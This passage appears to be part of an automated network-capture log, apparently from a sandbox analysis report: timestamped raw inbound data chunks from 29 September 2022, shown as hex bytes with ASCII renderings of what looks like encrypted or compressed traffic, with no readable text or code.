                                                                                                                                                    2022-09-29 12:59:14 UTC18583INData Raw: 38 13 18 99 38 ea 51 b4 cd 15 d1 77 ea 24 61 82 f9 25 a2 53 37 3e d8 c9 9b cd 3d 05 60 da b0 2e ee a4 e4 de 7b f1 81 64 dc 4b 5a 78 5a d5 43 68 34 75 a8 d2 26 12 38 eb 38 4c 68 8f 67 a6 94 83 d1 e7 14 d5 95 59 ee d6 0f 04 89 33 d1 56 b3 c4 f9 31 8a ad 8d ec ab 1f 00 ea a0 64 ad 87 2d fb 8f d4 0b 85 02 5c 95 7a 93 3f 13 72 cc 1f 1b d8 ef 36 14 74 6a 20 0a 5c 0f 87 1f d7 8e d8 e5 55 ce 65 3a 89 1a dc fe 17 4d 9e 45 58 81 69 92 a2 60 87 f5 ff c1 52 be 87 81 e9 4a 57 d1 ed 92 a4 f1 31 45 c2 9e 81 aa 6d 53 ef 14 79 0d 2b 72 be 6b 76 ea 72 84 52 b9 0b 51 2d a5 d3 d1 99 b0 f9 96 42 d8 ee 75 23 13 f6 aa 63 87 4b 48 88 00 74 f0 55 a3 8b f6 67 4b 1d bb ed 05 2a c5 eb 2b e1 9e f3 6b ac 07 14 12 dd 01 28 06 5d b2 11 59 2c eb 1a 7b a9 e1 a5 32 23 15 80 a4 30 41 87 a9
                                                                                                                                                    Data Ascii: 88Qw$a%S7>=`.{dKZxZCh4u&88LhgY3V1d-\z?r6tj \Ue:MEXi`RJW1EmSy+rkvrRQ-Bu#cKHtUgK*+k(]Y,{2#0A
                                                                                                                                                    2022-09-29 12:59:14 UTC18599INData Raw: 52 25 bd 65 bc 95 e7 45 23 03 14 2d 20 6b 9c d2 b3 da 1b 0a 23 0e f0 d9 fe 96 4d 78 7b ec 92 d2 4b 29 eb 26 56 1f 00 78 02 75 85 e2 ec 11 27 e0 0d 75 74 7c bc 27 1a d8 97 8e 76 b3 24 49 64 62 10 7f 37 ea 75 38 a8 f2 12 0d 42 12 10 5f e5 93 27 dd 9a 0e c7 a7 45 ff d1 48 67 17 d0 b8 ec 65 3a e7 fd 57 3c 9d e1 74 65 b9 16 bb d9 52 93 40 c0 0d e2 80 d2 82 d2 6b a3 6a 7b 5a c5 54 72 72 0c 6d 77 1e eb 1f af cc f0 94 e1 b1 35 b2 da 49 1b 25 eb 60 47 6f 29 a5 a6 50 61 ce ee 3d 8e 49 df 89 60 ca 4c 20 dc 92 a5 de 51 53 16 98 5b a8 20 88 48 23 b0 e8 85 19 d6 18 89 25 4a 07 c8 5f d8 84 c6 03 98 40 72 ab 26 1b 6a 04 40 b4 d9 e2 81 0e 10 65 db 67 72 8c a1 9f 50 1f 97 ae 8a cd b7 fa f1 62 d1 c8 ca 52 36 5a b3 d6 1e 57 32 d2 ea cd 1c 2b c0 be ec 2b 54 54 56 48 a2 52 15
                                                                                                                                                    Data Ascii: R%eE#- k#Mx{K)&Vxu'ut|'v$Idb7u8B_'EHge:W<teR@kj{ZTrrmw5I%`Go)Pa=I`L QS[ H#%J_@r&j@egrPbR6ZW2++TTVHR
                                                                                                                                                    2022-09-29 12:59:14 UTC18615INData Raw: 96 0b f9 d8 cf 0a f4 90 2f a7 3c a8 0e 35 ba db 4f 68 e6 02 b8 41 05 cc 2f 28 6f 30 c0 6b 54 a0 fc 90 25 1f c0 75 e7 0b 96 ab 02 3a e8 fe 62 66 cb 7c eb f0 ff e8 2f 15 2c ab ba ac f7 ba 25 69 3d 13 72 1d 61 28 b9 4f 41 88 51 d5 da 0d 3a 74 5a 79 fd 33 76 39 2d 50 3e 79 01 79 8b 22 27 70 d6 7d 09 90 2d cc 1c ef bd b2 73 bd 13 79 8b 1a a9 ee e5 11 96 5d 76 0a 63 e1 4d 81 95 fb 7f c3 66 89 d7 8a f4 45 77 cd 7b d4 22 d7 59 fd e5 1c 66 11 d8 c6 a5 31 2e f6 d5 e7 30 03 5d 24 f6 ca 57 16 44 c2 65 43 d1 c2 2b d2 4b c7 52 7c b2 a4 d0 61 a5 23 87 98 ff db 9c 8e 91 eb 67 81 41 b5 da f7 d5 17 1b a4 16 44 a9 c3 dc 9f b2 64 55 71 2e 34 de ec fe 5b 59 05 b5 74 1d 6c ad 9f f9 7c cb 8a f4 48 50 5b f6 a1 a7 9c 4a 18 0e 35 4b 03 d1 93 96 e5 ff c1 42 9a d6 34 31 3c e1 13 a4
                                                                                                                                                    Data Ascii: /<5OhA/(o0kT%u:bf|/,%i=ra(OAQ:tZy3v9-P>yy"'p}-sy]vcMfEw{"Yf1.0]$WDeC+KR|a#gADdUq.4[Ytl|HP[J5KB41<
                                                                                                                                                    2022-09-29 12:59:14 UTC18631INData Raw: 24 22 63 20 4c fa 3f 6f ac 90 f5 e2 b9 55 46 d7 52 df 1a b8 67 80 59 e4 64 5f 64 09 cd 71 d9 d4 c1 ed 32 d5 c5 24 85 c3 9b 8a 9c 1b b8 4c 8d 12 54 1b c7 ce bd e5 b7 f7 ec 61 9a 65 61 90 08 0b 4e 51 d6 9c 97 3c 5c be 69 82 ef 7e 86 a1 41 02 95 66 11 5d fe b7 b3 d2 c3 b6 c2 2a c6 eb bb ec ca 00 3a a8 d8 74 cb c5 2b e0 a9 44 5b 95 02 b2 32 46 06 d7 0c db 58 ea b4 a8 1b 98 01 7e 50 63 6b e9 bd fb 0e a0 1b b2 cc b2 b1 44 8c 78 bd 10 1a 2b 5f bd cc 98 ba 28 c8 a0 f3 68 3c cb 3c b4 3d f0 ef 52 27 fb 2f 77 70 50 e8 b9 11 2e 58 40 9d 4f 6a a1 3a f5 c4 08 7c bd f7 b5 48 c6 df 41 bc 1f 0a 77 bf 8c 47 47 a6 08 c2 fe b7 f8 4e 50 83 c5 a5 fe 59 ea ff 61 15 d8 50 5c f9 bb e4 bc 57 55 32 54 3d 90 86 9a 66 f4 9d 96 61 12 a1 cb d8 52 c2 fe 37 b5 d5 2b 45 2b 29 e8 c2 17 a1
                                                                                                                                                    Data Ascii: $"c L?oUFRgYd_dq2$LTaeaNQ<\i~Af]*:t+D[2FX~PckDx+_(h<<=R'/wpP.X@Oj:|HAwGGNPYaP\WU2T=faR7+E+)
                                                                                                                                                    2022-09-29 12:59:14 UTC18647INData Raw: c5 fa bf e5 76 2e 71 51 fd e5 32 33 0e ea 8a 80 1d ad 4f 9f 55 c9 5e 35 e2 6a a0 ca f5 f3 6b 9d 27 8a f8 be bf 48 0e 0c 34 8a 3a f9 f1 79 5e b6 5f 35 8b b7 f8 41 4a 02 db c0 8b bd 74 c7 c1 a0 71 7f ce dd c2 48 b8 3c 4a 58 7e 19 76 20 d7 79 a2 15 b1 a5 cb 46 11 59 72 cd 71 ad c4 6d d9 34 1d a3 54 a0 a1 59 61 15 76 ae 16 f6 ca 4a 4e 40 9e 02 71 4d 98 d1 27 fd 5c 80 f1 39 61 14 a5 58 97 9b f7 e3 64 c9 04 08 3b 5c 08 a9 f4 58 f3 5a 67 69 8f b1 f4 33 ed 95 e1 cb 46 59 36 45 57 4c d9 60 1e 25 40 bd 22 ce 7a ad a0 44 02 7c 83 50 81 38 46 09 04 64 0e fb 6b 05 33 8d 83 ec 96 b6 f8 53 01 6b 51 22 e7 21 08 23 b2 f6 a7 63 aa 60 40 5c 73 eb 57 3f 03 1d d3 dd a1 7e 75 43 7b 54 0a 30 26 8e f4 8f 74 c4 1d 86 4b 1c 78 7e 9b e5 b2 1d d6 2d b3 8c 5e d8 d1 a8 0d 45 05 51 2f
                                                                                                                                                    Data Ascii: v.qQ23OU^5jk'H4:y^_5AJtqH<JX~v yFYrqm4TYavJN@qM'\9aXd;\XZgi3FY6EWL`%@"zD|P8Fdk3SkQ"!#c`@\sW?~uC{T0&tKx~-^EQ/
                                                                                                                                                    2022-09-29 12:59:14 UTC18663INData Raw: 33 99 5d d8 e2 26 e5 b9 57 4c aa 5a b2 16 26 0f e0 4d dd f3 57 28 d7 31 a9 2f 69 1f 57 08 50 2a 04 b4 ce 2b 6b 02 c6 22 af 58 f0 56 98 fc aa dc 2e 41 68 b9 f0 99 bf 13 e7 4e a9 4c 63 5d 16 6b 15 cd 39 d7 10 3a bb cc fd ad f1 4a 4a 76 05 61 6e 16 77 65 91 15 b1 12 b3 49 f1 fb 59 12 8b 68 33 ac 56 83 9c 7a 83 23 d4 eb 49 f0 39 f0 05 a8 ca 68 21 d3 2e 36 70 9e 04 ef 26 9f ea 65 b8 b1 f6 c0 eb 37 ae 58 2e 1a 3f 47 71 bf c2 23 79 b9 7b a1 22 c7 e8 4c 99 0a 5e 37 2c 9e 78 79 4f 3f 76 69 eb 2c aa fc 48 3b 77 bf b5 de 95 3d e6 81 8c f6 da 10 5b 37 2a a1 11 94 a4 4c 0f 07 3a a6 ba 65 1b b3 c6 4b 66 fc c8 c0 b1 26 94 99 17 85 14 16 95 5f a2 c4 21 d3 f7 da 34 6e 5c cc de f4 2a 12 0d 52 e9 37 60 2f 46 9a 22 f9 4b 98 9a b1 a2 37 50 f9 6d 20 39 6b 5c 41 6c eb 31 b1 f9
                                                                                                                                                    Data Ascii: 3]&WLZ&MW(1/iWP*+k"XV.AhNLc]k9:JJvanweIYh3Vz#I9h!.6p&e7X.?Gq#y{"L^7,xyO?vi,H;w=[7*L:eKf&_!4n\*R7`/F"K7Pm 9k\Al1
                                                                                                                                                    2022-09-29 12:59:14 UTC18679INData Raw: ef 91 53 6a a2 c0 a3 7c b1 f4 4d ba 4c de ad ad 32 66 34 4d e3 8e 54 ec a1 5f 38 13 a5 9f ec 57 25 1e 04 b2 b2 95 14 77 8f 38 bd af 2e 26 a3 51 8c 97 2d fc 17 c7 b9 77 66 03 90 0a 29 94 a1 2a 72 34 89 79 d3 c5 79 80 09 16 1c ec 76 ac 78 92 a4 f6 af 6a 19 4d ab 24 a3 58 03 d4 61 4c e2 14 60 9d 5d 7a a0 6f 0b c3 3c 92 dd 1a 0b 96 0a 62 8d b7 39 e5 95 06 e2 aa 0a 63 0d 19 14 72 b2 1e 50 d1 06 10 d2 b0 d5 05 e4 32 a0 a4 87 d5 af 7c f5 42 22 77 51 85 50 0d 9b 6c 3d bb 2a dc be 5d 99 57 5b f5 5b fb df 09 4c 6a 74 dd 81 60 52 5b 73 71 0c 6b 26 f3 5c 67 6e dd 9e aa 14 7c 41 b9 d4 3f e4 7a b7 ef fd c1 9a 41 4c 47 5e 06 52 2d 71 1c 7c 31 ea f0 9e f9 35 80 dd aa 5c 2b fe 6a be a3 60 ed 87 12 f0 df 79 26 42 34 40 4e 54 58 36 e0 1c 7e c2 e1 b0 5a c3 15 bb ab c0 1e 7e
                                                                                                                                                    Data Ascii: Sj|ML2f4MT_8W%w8.&Q-wf)*r4yyvxjM$XaL`]zo<b9crP2|B"wQPl=*]W[[Ljt`R[sqk&\gn|A?zALG^R-q|15\+j`y&B4@NTX6~Z~
                                                                                                                                                    2022-09-29 12:59:14 UTC18695INData Raw: 3a b2 f0 f4 4d 30 db b8 3e 42 b9 42 cb 3e bc b7 0d 64 e0 40 e6 8d 3d 41 9b 33 51 60 58 f9 fd 06 f2 cf 03 96 08 7f db 6e f5 38 97 fe 8c fe df 4d 35 ec f1 d7 19 01 7f fc 2c f9 02 82 13 38 8f a1 b5 36 e0 e3 94 bf bc ec be 0f 58 64 6c 30 aa ab 78 5f 7b bc e0 c9 be 77 ab 99 32 7f 97 cd 7b 48 cb 3f 64 ec dd 05 55 00 58 7a 5d a8 5b 4d fc 9e 6a 08 78 70 5d d3 8a c6 66 88 19 34 1b e5 11 64 9b 5c 47 f2 34 db 60 8f 12 ff 57 32 ba 57 d4 4c af 34 87 f2 0e b8 80 95 95 94 3e 38 15 db 53 eb 4c 0a 50 0a 56 f0 31 0e f0 2d d3 98 4d 0a fb eb 97 af af c8 12 fd e9 86 a3 76 02 f0 13 a5 d5 79 0d 7b c0 d7 6c f3 f6 64 99 74 2b 4b d6 fc 52 89 ae 97 9e 12 0b 50 6e 39 a4 07 e3 96 f8 c8 0d e0 24 d0 9f 85 95 98 84 21 28 12 f9 85 98 16 62 53 9d 59 38 8d ef c6 27 1e ca 11 9c 92 37 67 1f
                                                                                                                                                    Data Ascii: :M0>BB>d@=A3Q`Xn8M5,86Xdl0x_{w2{H?dUXz][Mjxp]f4d\G4`W2WL4>8SLPV1-Mvy{ldt+KRPn9$!(bSY8'7g
                                                                                                                                                    2022-09-29 12:59:14 UTC18711INData Raw: ea b7 24 ae 0f 89 a4 96 9e 57 86 02 5e 44 c9 3a c4 5e 3b 20 87 f4 74 45 b3 c4 3d bc e9 53 15 e1 07 e7 d9 2a 5d 5b cb a0 4e 0d ed 08 af a3 5d e3 2e e5 2e 88 3b c4 35 5f 31 b5 6b 0a a8 a9 37 14 e2 23 4a 07 da e7 e1 a8 88 6c 10 77 be 33 f7 ce 5a 39 c9 34 d9 da f2 3e fa 4e a9 1f 15 0c c2 78 7b 2b 0b 1f 0a 2a ff b0 8d 6b 57 26 db 59 26 24 8d bc c1 ca 28 fc ee 0a 83 27 2b 5b d4 9a 5f 09 dd d4 21 75 ff 4c 2a 34 5e 01 b5 8e 20 ab e3 6c 6b 9b bc 5e 47 e7 cc e4 3b b2 41 e6 fd c8 52 00 9e c4 55 d0 bb d9 4a f7 51 9b 70 fd 35 ce fc 8c 45 0c b1 51 0a 6e 72 62 75 2a 89 0e 5b 19 6f 2b 00 61 b1 21 d1 0d 64 54 5b 90 36 8d 89 6b 0d 8a 4a 03 01 b3 52 7b 93 f9 e7 e8 2e 97 33 98 f1 0f cd be 34 ed bb be 1a 1e 96 d6 76 89 5b c7 16 a7 a0 cd 0a 4f e8 40 bc 14 51 09 f7 0c 39 2b b4
                                                                                                                                                    Data Ascii: $W^D:^; tE=S*][N]..;5_1k7#Jlw3Z94>Nx{+*kW&Y&$('+[_!uL*4^ lk^G;ARUJQp5EQnrbu*[o+a!dT[6kJR{.34v[O@Q9+
                                                                                                                                                    2022-09-29 12:59:14 UTC18727INData Raw: d2 c4 d5 66 17 cd 07 03 da 0f 33 7c 6e 9f 88 1e de da 41 ae 7b 45 64 db ab 9b 5a 92 a4 22 21 d2 f8 71 af 75 37 6c a4 db 0f 44 41 51 39 40 a0 0f 98 96 4c eb d2 ed ae 43 2a a8 21 80 75 64 7c 68 0c be e5 d4 71 6b 5d 5b 2f bf f2 77 ac ac b6 d5 d6 ec 4c 39 a9 a3 0d 78 75 aa 01 ba 74 1f 76 7c a4 52 a3 c8 07 32 5b de 9b 66 8e ac f3 b4 bf 1e cb eb d6 cd 20 83 08 68 5e b2 ff 62 4f 33 e8 f5 16 96 b6 24 08 1c 93 0b 2c 3e 08 de 00 ef 38 8a 45 28 a3 1a 73 e0 18 00 ff c9 88 3f af ee 8c 06 14 4a 2e 7e 4a 73 07 33 35 74 07 e0 fa c3 07 cb f9 ce f1 20 1d 92 8a f5 7e ea 64 98 4c ff 61 59 49 d7 ea 5c d0 6e df 73 31 fc 03 10 4c 74 1a 5b 58 c3 ef 18 6c a0 45 41 4e 04 f0 99 10 bd c1 29 54 db c8 7f c3 51 fd 17 c8 cb 32 05 f1 69 bc c4 2d b5 48 17 2c 83 fd de 61 b6 b6 ee 5f b8 05
                                                                                                                                                    Data Ascii: f3|nA{EdZ"!qu7lDAQ9@LC*!ud|hqk][/wL9xutv|R2[f h^bO3$,>8E(s?J.~Js35t ~dLaYI\ns1Lt[XlEAN)TQ2i-H,a_
                                                                                                                                                    2022-09-29 12:59:14 UTC18743INData Raw: 9a 3f fa 92 1a 30 74 e3 3e 30 aa a9 03 cb 57 e1 0d 45 34 c6 32 79 f3 89 03 49 2f ca ed 6c 1f da 27 49 d2 32 0e b2 b8 ea c6 be be 01 4b cc f8 f8 17 08 6a 56 88 88 69 7f 81 87 70 ea 9c 82 84 ae 6c 20 5c 33 b6 41 7b 97 73 d8 42 af 89 26 76 be ee 92 0a 1f f5 7e c7 59 ce 4c ce c3 b8 9e 2a 78 f7 e5 67 d3 e9 a3 12 8e 68 57 dc c7 52 96 35 15 05 63 df f6 57 1a f8 1e 10 7f da 40 7d 59 97 13 d9 b2 60 56 57 09 90 0f ef 34 35 c2 04 48 19 c9 b5 17 a1 59 83 2d 8f 1f 7f 1d f3 0c 6b e6 72 ba 8a ef 03 d4 bc 93 cf cb 1b b9 c5 ef ea c7 ad 13 99 c5 3f b6 2d 7b 38 52 0d 40 4d b6 7e 74 42 b0 65 53 5a 48 0d cb 0e 44 91 9e 0b db 64 00 1f 3d 31 43 9a 79 17 62 2a 3a b4 86 e0 50 02 6f 77 b2 5c ee 7d 78 04 49 36 02 03 a6 a2 2a 49 88 08 86 d6 aa df b1 b8 8c 71 b6 92 78 79 9a 7f 2b 11
                                                                                                                                                    Data Ascii: ?0t>0WE42yI/l'I2KjVipl \3A{sB&v~YL*xghWR5cW@}Y`VW45HY-kr?-{8R@M~tBeSZHDd=1Cyb*:Pow\}xI6*Iqxy+
                                                                                                                                                    2022-09-29 12:59:14 UTC18759INData Raw: 7a f3 e2 34 77 4a 3d b2 7a a5 18 54 e7 f2 9f 77 ad e6 b6 d1 c2 f2 d7 9a 77 a6 85 90 ce 84 0e 16 f7 90 a0 6d b5 5d fd e2 f9 eb 2e 82 c0 50 f3 18 9d 00 2b 0a 18 af a8 de 4b 6d c5 11 7d 02 ee 79 89 65 61 8b 3c ae 2b d5 45 2f 8f 95 45 7f 2a 72 a8 7d 8f f3 e0 55 fc dc da e8 48 4d bc 71 e8 6b 4e ba 8f b7 28 4a db e4 c7 74 6d a8 e8 be c7 82 ac 03 65 ac cb 56 fb 76 b3 d4 3d e9 43 a6 88 d7 73 a4 c5 c6 43 9d a3 c0 14 7f 2a 38 6d fa 37 a8 22 63 cd b9 ec c3 be 73 71 8d 18 79 90 be 3a 31 6f c8 96 b6 23 d4 27 fd 86 d2 92 96 e9 88 e4 4d af ef bc 2a 57 67 d1 da e2 48 92 79 17 ee b0 98 6c fa 03 23 55 30 c3 ff 77 c0 ee 0f cc 34 2d f7 61 c2 5e 1e c8 d4 b4 4e 25 9e 54 9f 55 8e df 2f 42 40 d9 15 c8 32 00 3f 9f ca 19 9a a3 63 c9 e7 d6 79 6a 3c 2a 88 b9 52 0b bd 95 6d 84 b5 f7
                                                                                                                                                    Data Ascii: z4wJ=zTwwm].P+Km}yea<+E/E*r}UHMqkN(JtmeVv=CsC*8m7"csqy:1o#'M*WgHyl#U0w4-a^N%TU/B@2?cyj<*Rm
                                                                                                                                                    2022-09-29 12:59:14 UTC18775INData Raw: a5 98 b9 9b 76 f1 cf 0a 41 e6 89 f0 fd 34 f3 80 3a 6a 05 44 ab 27 bf ff 87 fe 4d 80 6f a8 d9 64 30 b8 18 a7 d6 46 77 1e 85 86 0c 91 73 b3 88 9b 1f 10 63 61 12 8a 12 39 53 3d 3f 9e 8c b4 02 fe 79 7a 09 1b 19 bc de c8 b5 2a 41 a6 74 e7 4f 34 7e da 96 8b f2 f2 6c 25 9d 95 60 09 8a 4f 77 c5 1d 35 17 99 9a 8c 90 71 a4 3d d8 d4 01 7c fb 2d b8 2b 92 57 3d 92 f0 b9 90 d7 db 29 ea f2 00 84 aa 9e 0b eb 57 96 4b 61 17 77 26 db 32 90 46 0b f0 6e b8 5d 0b 44 5e 71 a7 2a e6 29 d2 ad 16 34 e5 c3 34 f1 64 77 c1 e3 5a 18 da 47 03 53 bd 1c df 34 0b 9f 71 45 a3 d1 01 61 be 4d a0 1f 2a 3c 55 e6 4c 1e c9 b1 8f 7c b2 ed 15 4b b0 94 1e 7f 8c 1c 9e fc 3b 67 64 86 66 2d 36 34 7e 11 85 1a 99 01 9c 8e 70 b4 75 34 32 12 40 ee 8a 68 16 ee cb d1 c8 73 e8 8a 8a 32 c0 33 6a 3d 78 04 00
                                                                                                                                                    Data Ascii: vA4:jD'Mod0Fwsca9S=?yz*AtO4~l%`Ow5q=|-+W=)WKaw&2Fn]D^q*)44dwZGS4qEaM*<UL|K;gdf-64~pu42@hs23j=x
                                                                                                                                                    2022-09-29 12:59:14 UTC18791INData Raw: 86 9a 0c 01 5c 21 db 93 83 8c c4 9f 20 1c a9 58 cf 93 9b 59 35 ed 09 3b 6a e5 c5 30 97 22 d3 86 0d bd 57 a5 e1 51 be 20 25 c1 0b dc 6c ca 7f 23 51 97 d2 3e d6 ca de e7 b7 4d e4 2c 1d 94 ed 32 b8 4a 38 50 c0 ac af fb c9 27 0f 8e ac b7 c3 75 d9 fa 1f ef 71 02 2b 1c ed 49 ba 9f 90 f1 c3 21 d2 ab 80 a2 b2 cb 3d 63 fe 7f 43 09 57 64 86 d2 6e ea 85 5d cc 2f 38 e4 a6 d2 71 3f 70 ed 41 00 97 fb 50 20 a0 ef ec b9 8e 92 35 02 1b 6f 80 2c 1e 76 b0 35 ea 25 76 b3 f1 bf d9 fd f2 db fc f5 64 4b 30 e7 40 60 f4 f3 5b ff a6 27 91 81 e4 1e 7c f7 3c 21 c7 26 db 89 06 77 2a a3 1a cd 18 dd 20 fc d4 0d 9e 2c a4 d6 5c 0a cc 1e a9 ed 5f d8 c2 20 1e 79 09 0a d9 18 5e 1d 8a 13 bd 97 2d ab 3a 06 1a 9e b1 09 1f 60 ea 26 f0 93 9f 25 e7 f8 2e 12 85 18 d6 fc 99 91 09 3f d9 e2 9a 67 b5
                                                                                                                                                    Data Ascii: \! XY5;j0"WQ %l#Q>M,2J8P'uq+I!=cCWdn]/8q?pAP 5o,v5%vdK0@`['|<!&w* ,\_ y^-:`&%.?g
                                                                                                                                                    2022-09-29 12:59:14 UTC18807INData Raw: 35 85 12 70 26 00 08 36 ca f6 93 b0 cf 41 63 2e 1f a5 8e 60 22 1b 38 f9 54 cb 73 0f 4a 7f e8 f3 32 31 fe 59 33 af 90 b1 0e 94 1d 4b 32 61 c8 3d c6 5c e6 da b4 3b eb b2 4f 9d 5c 85 30 45 d8 07 c8 9d 54 ab 09 2c a4 ac 29 99 a7 53 7c cd 9a 7d 85 0b 21 be 33 92 98 60 b6 19 39 e3 7d 2b ce c1 09 43 2b 53 e8 46 14 ca 1c 70 4b bc b3 b7 ab 7b ea fc 5e 1d 9c f8 45 7a fd 2e 3a a0 2a 75 a0 66 df f8 cb ae 5f 6b 2b 15 12 1d 69 cd 14 45 44 d6 8f 0b 63 bb 3e 18 73 13 2a c4 10 94 ed c9 93 1c fd a2 fd 56 af fe bc 08 31 aa 1a 01 23 3c 71 05 93 cc a0 65 d6 fe 2b 2a a9 64 ca b9 b4 f2 92 e8 f0 46 37 b1 fa 2a 6d 07 2a db 5c 0b f9 04 1a 9d 9e 6e 43 74 9e 2e cd 8c ee 7e 97 62 b4 cb 38 a5 bb 43 f5 ba ea 51 f7 8c c4 d0 b6 4f a4 f2 fa 5f de 9a 13 e9 c2 2e 90 64 4d dd 96 f9 1c ea 9c
                                                                                                                                                    Data Ascii: 5p&6Ac.`"8TsJ21Y3K2a=\;O\0ET,)S|}!3`9}+C+SFpK{^Ez.:*uf_k+iEDc>s*V1#<qe+*dF7*m*\nCt.~b8CQO_.dM
                                                                                                                                                    2022-09-29 12:59:14 UTC18823INData Raw: 7e 28 a5 d6 07 9f 5b 02 53 b2 80 73 7d e0 43 bd 53 b1 b3 c8 e1 21 90 ac c3 50 65 62 2a 74 c8 79 48 c9 d0 68 84 0e 64 33 51 4c d0 02 ca 9d b7 e1 c7 28 aa d0 81 89 4b 84 57 cd b3 86 67 a0 c4 df a8 57 05 9a 99 d5 01 71 e9 f9 c9 7c 9f 02 03 e1 e7 08 f9 06 74 e9 9a b1 e0 44 d5 fa 40 91 6e 2a 6c f6 7f 1a b1 f7 bc ec 21 e9 1c 6d 3b 5c c3 53 39 b7 ed c3 c4 00 ea 1b 49 22 df b7 e8 af f7 d8 a6 f8 3f b7 a3 44 46 af 14 7a 59 9e dc d4 84 d0 a6 06 d9 b9 14 46 8a 9b 3a c2 40 dd 9e 35 4c 4d 4f 6e 5e 66 93 19 57 65 97 73 cd aa 1b f6 ed f6 c1 86 16 ef 37 74 d7 68 b4 4a 9d 9d 42 49 6e 58 45 2a fc db 04 c3 96 09 ac 23 87 60 ea 46 d2 14 1f f9 08 3b 9a 62 79 32 29 4a 52 8c 36 c9 b2 af 71 8f 68 a7 ae 3a f2 78 48 cb 26 cf 10 8a a5 bf 7e fc 8d 7d 72 66 0c e2 c6 c1 b8 1a 9e c7 02
                                                                                                                                                    Data Ascii: ~([Ss}CS!Peb*tyHhd3QL(KWgWq|tD@n*l!m;\S9I"?DFzYF:@5LMOn^fWes7thJBInXE*#`F;by2)JR6qh:xH&~}rf
                                                                                                                                                    2022-09-29 12:59:14 UTC18839INData Raw: 51 8e f3 65 b9 5c c9 d1 e4 d5 d4 63 57 3a 92 54 7a 28 a3 68 13 91 d5 64 98 18 26 ab 6a cc 67 a6 53 73 fc 63 e7 69 67 00 a3 8d bc 0a 23 b4 52 80 6d e0 97 6f 4f 65 46 76 4f 08 be c5 f0 06 10 2a f6 1f d2 e8 74 92 06 e1 b6 0a d4 40 c8 f5 cc 19 3b 62 f0 8c 2e 72 9d 44 1a 35 1c 2b ca b8 3e 82 30 f9 ce ce 83 af e7 5e 66 6e ae 08 23 ed a2 eb b4 46 5b 2a 90 11 ce 1f a5 ea 94 4e d4 c9 42 c0 fb 3d 89 9a d7 e7 81 22 42 55 85 12 3e cd c8 12 bf dd 89 78 f1 40 cc bb 80 e3 87 42 d1 36 22 2d a8 5d cb 55 dd 0f 1d 47 b8 b8 12 66 8c ff d5 69 96 e5 b9 85 18 29 c9 02 e1 68 72 ab ba 84 54 95 05 d9 ca 1e 81 71 48 5d 84 19 a0 99 01 e2 27 0f 83 29 3d b5 25 47 6b 0b e4 4c 40 fe 45 87 6d cf 05 e7 e0 dc c5 de 2a 7e 5e e4 ae 20 8e e2 48 79 41 b1 f5 95 ca 51 b7 ef 32 f3 0f a3 f3 49 10
                                                                                                                                                    Data Ascii: Qe\cW:Tz(hd&jgSscig#RmoOeFvO*t@;b.rD5+>0^fn#F[*NB="BU>x@B6"-]UGfi)hrTqH]')=%GkL@Em*~^ HyAQ2I
                                                                                                                                                    2022-09-29 12:59:14 UTC18855INData Raw: 4e 41 c9 68 ac f3 37 f5 7d ba bc 85 0b 9e 95 df 51 1d 67 d5 57 5d ea 4a b0 1b d6 fd 88 9b 67 c7 05 c6 a0 1e 2a 22 9e b8 db 3d 7c 3a 2f 30 33 b9 ca e8 e3 00 4d 92 3f 85 38 d0 69 0b 1f 6a 4c f3 99 1c 0d 34 ce 4d fb a0 e9 95 be 59 a8 ac 1d d0 fd 54 ec a5 ab 90 f3 c6 e0 96 a4 26 e5 8c 77 03 db fe da 29 f2 1c 33 93 24 3d d7 01 7f 2c b2 86 36 ba fe e4 67 58 ee ae 91 37 ee 3c 4f 81 22 95 3b a2 72 9b 60 09 47 e7 b2 ba 77 45 32 c4 76 36 49 20 58 ce b7 bb 04 de 91 b0 6e df 60 4a 3c c1 e6 85 75 8c 69 2d b2 91 c9 1e a3 e3 29 f6 54 5a 79 ed d6 20 4d ee 82 dc 28 56 c6 20 34 01 fc e9 15 9d a8 4f 0f bf ec 29 67 22 54 8b be 66 ca 38 a1 45 d0 df 00 3b 4a 14 b9 9f 62 9d 51 93 1c 85 b4 6e 48 c4 9f 93 10 c4 0e 38 fb cb 3b ce ee 72 16 2b 87 12 7f a5 da 3d d3 5e cb b2 c4 13 00
                                                                                                                                                    Data Ascii: NAh7}QgW]Jg*"=|:/03M?8ijL4MYT&w)3$=,6gX7<O";r`GwE2v6I Xn`J<ui-)TZy M(V 4O)g"Tf8E;JbQnH8;r+=^
                                                                                                                                                    2022-09-29 12:59:14 UTC18871INData Raw: bb b8 d0 c2 25 a4 aa 5d e6 3a b7 74 d8 ad f4 03 4b 39 89 15 0d 8f ce f6 a4 ad f1 d1 7c 7f eb e3 50 7a 82 f2 d4 1a 4c a9 03 e7 b7 8c 04 8b ad 21 54 6e 5a 7c 7c d1 c4 7b 3e 92 50 4f 4f 01 e8 06 26 aa 0f 5b f2 7d 4d 3d f1 73 d6 71 93 06 3a f4 4b c8 65 63 ec 51 67 fc 47 00 fa a9 35 38 da a6 b8 b9 aa 20 19 1a 0b 15 13 8e 6d 99 8e 15 85 1a b4 f2 0b 06 d8 e2 2f e1 6f b4 bd 53 f7 ea 7b dc 1c a6 94 c7 2b c8 4f 64 24 81 1f 58 3d a8 fb fc 94 b0 fe 10 ee 66 b9 97 c2 13 13 8c 04 ba 83 f2 a9 ba cf 93 7c d2 7e 4a 5f 45 76 d3 34 ed 70 83 ae 4e e4 34 64 6a ef c0 0b 8f 73 8c 54 b2 a6 8b 09 37 68 13 d6 c1 d5 1b 77 51 96 f2 e3 7c 9e 43 a4 68 fa 7c 81 5d 98 14 93 33 00 22 e2 59 e6 c0 09 e5 39 8a 90 9a 7c 35 17 68 bb 12 fe 79 10 4d 60 da df 54 fd aa eb 62 c7 e4 be 79 10 7f 6a
                                                                                                                                                    Data Ascii: %]:tK9|PzL!TnZ||{>POO&[}M=sq:KecQgG58 m/oS{+Od$X=f|~J_Ev4pN4djsT7hwQ|Ch|]3"Y9|5hyM`Tbyj
